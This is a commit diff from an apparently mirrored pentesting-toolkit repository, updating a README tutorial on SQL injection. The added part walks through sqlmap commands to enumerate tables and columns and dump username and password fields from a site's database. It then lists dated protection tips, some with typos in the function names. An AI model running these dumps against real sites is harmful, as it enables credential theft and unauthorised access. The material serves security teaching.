Git-Mirrors/sec-pentesting-toolkit
1
0
Fork 0
mirror of https://github.com/autistic-symposium/sec-pentesting-toolkit.git synced 2025-04-27 19:16:08 -04:00
Code Issues Packages Projects Releases Wiki Activity

readme

Browse Source
This commit is contained in:
bt3gl 2014-11-19 13:26:38 -05:00
parent 0df35f519f
commit 7091a95fdc
1 changed files with 52 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

53
Web_Exploits/SQLi/README.md
View File

@ -1,5 +1,7 @@
# SQL Injections (SQLi)
![](http://i.imgur.com/AcVJKT2.png)
* A SQL query search can be easily manipulated and assume that a SQL query search is a reliable command. This means that SQL searches are capable of passing, unnoticed, by access control mechanisms.
* Using methods of diverting standard authentication and by checking the authorization credentials, you can gain access to important information stored in a database.
@ -94,7 +96,56 @@ $ ./sqlmap.py -u <WEBSITE> --dbs
(...)
```
From this we can verify what databases we have available, for example. From this we can find out how many tables exist, and their respective names. The sqlmap command is ```--tables <DATABASE-NAME>```.
#### Gaining access to the Database
* From this we can verify what databases we have available, for example. From this we can find out how many tables exist, and their respective names. The sqlmap command is:
```
./sqlmap -u <WEBSITE> --tables <DATABASE-NAME>
```
* The main objective is to find usernames and passwords in order to gain access/login to the site, for example in a table named *users*. The sqlmap command is
```
./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME>
```
This will return information about the columns in the given table.
* Now we can dump all the data of all columns using the flag ```-C``` for column names:
```
./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME> -C 'id,name,password,login,email' --dump
```
If the password are clear text (not hashed in md5, etc), we have access to the website.
## Some Protection Tips
* Never connect to a database as a super user or as a root.
* Sanitize any user input. PHP has several functions that validate functions such as:
- is_numeric()
- ctype_digit()
- settype()
- addslahes()
- str_replace()
* Add quotes ```"``` to all non-numeric input values that will be passed to the database by using escape chars functions:
- mysql_real_escape_string()
- sqlit_escape_string()
```php
$name = 'John';
$name = mysql_real_escape_string($name);
$SQL = "SELECT * FROM users WHERE username='$name'";
```
* Always perform a parse of data that is received from the user (POST and FORM methods).
- The chars to be checked:```", ', whitespace, ;, =, <, >, !, --, #, //```.
- The reserved words: SELECT, INSERT, UPDATE, DELETE, JOIN, WHERE, LEFT, INNER, NOT, IN, LIKE, TRUNCATE, DROP, CREATE, ALTER, DELIMITER.
* Do not display explicit error messages that show the request or a part of the SQL request.
* Erase user accounts that are not used (and default accounts).
* Other tools: blacklists, AMNESIA, Java Static Tainting, Codeigniter.